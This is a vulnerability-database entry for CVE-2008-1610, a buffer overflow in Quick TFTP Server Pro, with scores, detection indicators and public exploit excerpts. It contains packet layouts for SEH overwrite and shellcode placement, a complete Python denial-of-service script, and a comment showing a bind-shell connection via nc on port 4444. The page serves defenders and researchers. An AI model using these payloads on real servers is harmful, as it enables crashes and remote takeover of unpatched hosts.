CVE-2008-1610
published 2008-04-01CVE-2008-1610: Stack-based buffer overflow in TallSoft Quick TFTP Server Pro 2.1 allows remote attackers to cause a denial of service or execute arbitrary code via a long…
PriorityP263high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
53.91%
98.9th percentile
Stack-based buffer overflow in TallSoft Quick TFTP Server Pro 2.1 allows remote attackers to cause a denial of service or execute arbitrary code via a long mode field in a read or write request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tallsoft_quick | tftp_server_pro | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x00\x02 + filename + \x00 + 'A'*1019 + \xeb\x08\x90\x90 + \x58\x14\xd3\x74 + \x90*16 + shellcode + \x00
bytes↗
\x00\x02 + 4-byte-random + \x00 + 'A'*1019 + SEH_payload + \x00
bytes↗
\x00\x02 + \x66\x69\x6c\x65\x2e\x74\x78\x74\x00 + 'A'*1200 + \x00
- →Detect oversized TFTP WRQ/RRQ mode field: a UDP packet to port 69 with opcode \x00\x01 or \x00\x02 followed by a filename, null byte, then a mode field exceeding ~1019 bytes is the attack pattern. ↗
- →The exploit payload begins with TFTP write-request opcode \x00\x02, making WRQ packets with abnormally long mode fields (>1000 bytes) a reliable detection trigger on UDP/69. ↗
- →SEH overwrite uses short JMP \xeb\x08\x90\x90 followed by return address \x58\x14\xd3\x74 (oledlg.dll on XP SP2); presence of this byte sequence in a TFTP mode field is a strong indicator of exploitation. ↗
- →Successful exploitation opens a bind shell on TCP port 4444; monitor for unexpected listening services on port 4444 on TFTP server hosts post-exploitation. ↗
- →Bad characters for payload construction are \x00\x20\x0a\x0d; shellcode in network traffic to UDP/69 avoiding these bytes in the mode field is characteristic of this exploit. ↗
- →MS Update KB926436 corrupts the oledlg.dll opcode address used by the exploit, causing a DoS instead of code execution; patched systems may still crash, so monitor for TFTP server process crashes. ↗
- ·The Metasploit module targets two specific return addresses depending on OS; the oledlg.dll address (0x74D31458) is broken by MS KB926436 on patched XP SP2 systems, resulting in DoS only rather than code execution. ↗
- ·Payload space is limited to 460 bytes with a stack adjustment of -3500; payloads larger than this will not function correctly with the Metasploit module. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Quick TFTP Server Pro 2.2 - Denial of Service
exploitdb·2013-06-07
CVE-2008-1610 Quick TFTP Server Pro 2.2 - Denial of Service
Quick TFTP Server Pro 2.2 - Denial of Service
---
#!/usr/bin/python
#Exploit Title: Quick TFTP Server 2.2 DoS
#Date: 6th June 2013
#Exploit Author: npn
#Exploit Author Homepage: http://www.iodigitalsec.com/
#Exploit Author Write Up: http://www.iodigitalsec.com/blog/fuzz-to-denial-of-service-quick-tftp-server-2-2/
#Vendor Homepage: http://www.tallsoft.com/tftpserver.htm
#Software Link: http://www.tallsoft.com/tftpserver_setup.exe
#Version: 2.2
#Tested on: Windows XP SP3 English
from socket import *
import sys
import select
pwn = "\x00\x02"
pwn += "\x66\x69\x6c\x65\x2e\x74\x78\x74\x00"
pwn += "A"*1200
pwn += "\x00"
address = ('192.168.200.20', 69)
server_socket = socket(AF_INET, SOCK_DGRAM)
server_socket.sendto(pwn, address)
Exploit-DB
Quick TFTP Server Pro 2.1 - Transfer-Mode Overflow (Metasploit)
exploitdb·2010-06-15
CVE-2008-1610 Quick TFTP Server Pro 2.1 - Transfer-Mode Overflow (Metasploit)
Quick TFTP Server Pro 2.1 - Transfer-Mode Overflow (Metasploit)
---
##
# $Id: quick_tftp_pro_mode.rb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Quick FTP Pro 2.1 Transfer-Mode Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Quick TFTP Pro server
product. MS Update KB926436 screws up the opcode address being used in oledlg.dll resulting
in a DoS. This is a port of a sploit by Mati "muts" Aharoni.
},
'Author' => 'Saint Patrick',
'Version' => '$Revision: 9525 $',
'Refer
Exploit-DB
Quick TFTP Server Pro 2.1 - Remote Overflow (SEH)
exploitdb·2008-03-26
CVE-2008-1610 Quick TFTP Server Pro 2.1 - Remote Overflow (SEH)
Quick TFTP Server Pro 2.1 - Remote Overflow (SEH)
---
#!/usr/bin/python
# Quick TFTP Pro 2.1 SEH Overflow (0day)
# Tested on Windows XP SP2.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/quick-tftp-poc.py.txt
#########################################################
# bt ~ # quickftp.py
# [*] Quick TFTP Pro 2.1 SEH Overflow (0day)
# [*] http://www.offensive-security.com
# [*] Sending evil packet, ph33r
# [*] Check port 4444 for bindshell
# bt ~ # nc -v 172.16.167.130 4444
# (UNKNOWN) [172.16.167.130] 4444 (krb524) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Administrator>
##########################################################
import socket
import sys
print
Metasploit
Quick FTP Pro 2.1 Transfer-Mode Overflow
metasploit
Quick FTP Pro 2.1 Transfer-Mode Overflow
Quick FTP Pro 2.1 Transfer-Mode Overflow
This module exploits a stack buffer overflow in the Quick TFTP Pro server product. MS Update KB926436 screws up the opcode address being used in oledlg.dll resulting in a DoS. This is a port of a sploit by Mati "muts" Aharoni.
No writeups or analysis indexed.
http://secunia.com/advisories/29494http://www.offensive-security.com/0day/quick-tftp-poc.py.txthttp://www.securityfocus.com/bid/28459https://exchange.xforce.ibmcloud.com/vulnerabilities/41499https://www.exploit-db.com/exploits/5315http://secunia.com/advisories/29494http://www.offensive-security.com/0day/quick-tftp-poc.py.txthttp://www.securityfocus.com/bid/28459https://exchange.xforce.ibmcloud.com/vulnerabilities/41499https://www.exploit-db.com/exploits/5315
2008-04-01
Published